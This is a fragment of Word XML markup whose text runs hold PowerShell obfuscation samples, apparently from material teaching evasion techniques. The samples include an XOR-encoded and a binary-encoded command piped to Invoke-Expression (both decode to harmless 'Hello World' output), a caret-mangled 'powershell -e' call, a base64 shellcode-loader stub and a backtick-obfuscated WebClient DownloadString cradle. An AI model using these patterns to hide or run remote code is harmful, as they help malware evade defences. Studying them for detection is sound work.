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>GQ4SANJQEA2TIIBTGIQDIOJAGUYCANJSEAZTEIBUHEQDIOBAGQ4SAMZSEA2TIIBVGMQDGMRAGQ4SANJQEA2TAIBTGIQDIOJAGQ4CANJTEAZTEIBUHEQDKMZAGUZCAMZSEA2DSIBUHAQDKNBAGMZCANBZEA2TAIBVGIQDGMRAGQ4SANJTEA2TGIBTGIQDKNJAGQ4SAMZSEA2DSIBVGEQDKMBAGMZCANBZEA2TAIBVGQQDGMRAGU2CANJREAZTEIBUHEQDKMZAGQ4CAMZSEA2DSIBVGUQDKMBAGMZCANBZEA2TAIBVGUQDGMRAGQ4SANJTEA2TEIBTGIQDIOJAGUZCANJREAZTEIBVGQQDIOJAGMZCANBZEA2TEIBVGAQDGMRAGQ4SANJTEA2TEIBTGIQDIOJAGU2CANBYEAZTEIBUHEQDKMBAGUZSAMZSEA2DSIBVGIQDKMBAGMZCANJUEA2TAIBTGIQDIOJAGUZCANJSEAZTEIBUHEQDKMBAGUZCAMZSEA2DSIBVGAQDKNBAGMZCANJUEA2DSIBTGIQDIOJAGUZSANJSEAZTEIBUHEQDKMZAGU2CAMZSEA2DSIBVGEQDKMBAGMZCANBZEA2TAIBVGQQDGMRAGQ4SANJSEA2TCIBTGIQDKNBAGUZSAMZSEA2DSIBUHEQDKMZAGMZCANBZEA2TAIBVGMQDGMRAGQ4SANJTEA2TEIBTGIQDIOJAGQ4SANBYEAZTEIBUHEQDKMBAGUZCAMZSEA2DSIBVGMQDKMZAGMZCANBZEA2TGIBUHAQDGMRAGQ4SANJTEA2DSIBTGIQDIOJAGUZCANBZEAZTEIBUHEQDKMBAGUZSAMZSEA2DSIBUHEQDKMBAGMZCANJUEA2TGIBTGIQDIOJAGUYCANJVEAZTEIBUHEQDKMZAGUZCAMZSEA2DSIBVGIQDKMRAGMZCANBZEA2DQIBVGUQDGMRAGQ4SANJSEA2DSIBTGIQDKNBAGQ4CAMZSEA2DSIBVGMQDKMRAGMZCANBZEA2DSIBUHEQDGMRAGQ4SANJQEA2TGIBTGIQDIOJAGUZSANJTEAZTEIBVGUQDIOJAGMZCANBZEA2TGIBUHAQDGMRAGQ4SANJQEA2TKIBTGIQDIOJAGQ4CANJTEAZTEIBVGQQDIOJAGMZCANBZEA2TKIBVGAQDGMRAGQ4SANJQEA2TCIBTGIQDIOJAGUYCANJTEAZTEIBUHEQDKMZAGQ4CAMZSEA2DSIBVGQQDKMJAGMZCANBZEA2TEIBVGIQDGMRAGQ4SANJTEA2TGIBTGIQDIOJAGUYCANJQEAZTEIBUHEQDKMBAGUZCAMZSEA2DSIBVGAQDIOJAGMZCANBZEA2TGIBVGMQDGMRAGQ4SANJUEA2TEIBTGIQDIOJAGUZCANBZEAZTEIBUHEQDKMBAGU2CAMZSEA2TIIBUHAQDGMRAGU2CANJTEAZTEIBVGQQDKMBAGMZCANBZEA2TAIBVGUQDGMRAGQ4SANJTEA2TCIBTGIQDIOJAGUZCANJSEAZTEIBUHEQDKMBAGU2SAMZSEA2DSIBVGIQDIOJAGMZCANJUEA2DQIBTGIQDIOJAGUZSANJSEAZTEIBUHEQDIOJAGQ4CAMZSEA2DSIBVGIQDKMBAGMZCANBZEA2DQIBVGIQDGMRAGQ4SANBYEA2TAIBTGIQDIOJAGQ4SANJQEAZTEIBUHEQDKMBAGUYCAMZSEA2TIIBUHAQDGMRAGU2CANJTEAZTEIBVGQQDKMBAGMZCANBZEA2TCIBUHEQDGMRAGU2CANJQEAZTEIBVGQQDKMZAGMZCANBZEA2DSIBVGEQDGMRAGQ4SANJSEA2TAIBTGIQDIOJAGQ4CANJUEAZTEIBUHEQDKMZAGUYSAMZSEA2DSIBVGUQDKMBAGMZCANBZEA2TAIBVGMQDGMRAGQ4SANJTEA2TIIBTGIQDIOJAGQ4SANJUEAZTEIBUHEQDKMZAGUZCAMZSEA2DSIBVGAQDKMZAGMZCANBZEA2TKIBVGAQDGMRAGQ4SANJQEA2DSIBTGIQDKNJAGQ4Q</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/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>[Byte[]]$var_code = [System.Convert]::FromBase64String('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')</w:t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/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>"C:\Windows\System32\cmd.exe" /c p^ow^ER^s^HE^LL -e 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</w:t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/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>powershell  -NoProfil -NonInter     "((97,68 ,95 ,66,83 , 27 , 126, 89 , 69 , 66 ,22 ,17 , 126,83,90 , 90 ,89,22 , 97,89, 68 ,90 ,82 , 23 , 17 ,22 , 27 , 112, 89 ,68, 83 , 81,68 , 89,67 ,88 , 82 ,117, 89 , 90,89, 68 , 22 ,113,68 , 83,8</w:t>
      </w:r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>3 ,88,13 , 22,97,68 , 95,66 , 83,27 ,126,89 , 69 , 66 , 22 , 17 , 121,84, 80, 67 ,69,85,87, 66,95, 89, 88 , 22, 100 ,89, 85, 93 , 69, 23, 17 ,22,27 , 112,89 ,68 ,83 ,81 , 68 , 89, 67, 88 ,82,117, 89,90 , 89, 68,22 ,113,68, 83 , 83,88 )</w:t>
      </w:r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>| fOREACh-objEct{[ChAR]($_ -bxoR'0x36' )} )-jOIn'' | InVOKE-ExpressIon"</w:t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/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>• Invoke-Expression (New-Object "`N`e`T`.`W`e`B`C`l`i`e`N`T")."`D`o`w`N`l`o`A`d`S`T`R`i`N`g"( </w:t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/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr/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>powershell   -NonIn  -NoProf     IEX( -Join ('1010111&lt;1110010&gt;1101001a1110100&gt;1100101r101101{1001000@1101111l1110011l1110100a100000&lt;100111m1001000r1100101{1101100{1101100{1101111&gt;100000{1010111&gt;1101111&gt;1110010m1101100O1100100a100001O100111&amp;100000@101101&amp;1000110&lt;1101111a1110010&amp;1100101&amp;1100111O1110010r1101111r1110101&lt;1101110O1100100m1000011{1101111&gt;1101100m1101111{1110010m100000{1000111a1110010&gt;1100101&gt;1100101m1101110&amp;111011O100000r1010111&amp;1110010l1101001{1110100{1100101r101101@1001000&amp;1101111&gt;1110011&lt;1110100&amp;100000&gt;100111a1001111{1100010a1100110@1110101{1110011&amp;1100011r1100001@1110100l1101001&gt;1101111a1101110a100000@1010010a1101111r1100011a1101011m1110011{100001&lt;100111a100000{101101@1000110a1101111{1110010m1100101a1100111&gt;1110010l1101111m1110101l1101110@1100100r1000011&amp;1101111r1101100O1101111m1110010a100000@1000111@1110010O1100101@</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue Light" w:hAnsi="Helvetica Neue Light" w:cs="Helvetica Neue Light"/>
          <w:sz w:val="28"/>
          <w:sz-cs w:val="28"/>
          <w:u w:val="single" w:color="54A3F8"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">1100101@1101110'.Split</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica Neue Light" w:hAnsi="Helvetica Neue Light" w:cs="Helvetica Neue Light"/>
          <w:sz w:val="28"/>
          <w:sz-cs w:val="28"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">( 'l@&gt;{r&lt;mOa&amp;') | ForEach-Object{ ( [Convert]::ToInt16(( [String]$_ ) , 2 ) -As[Char]) } ))</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:sz w:val="24"/>
          <w:sz-cs w:val="24"/>
          <w:color w:val="000000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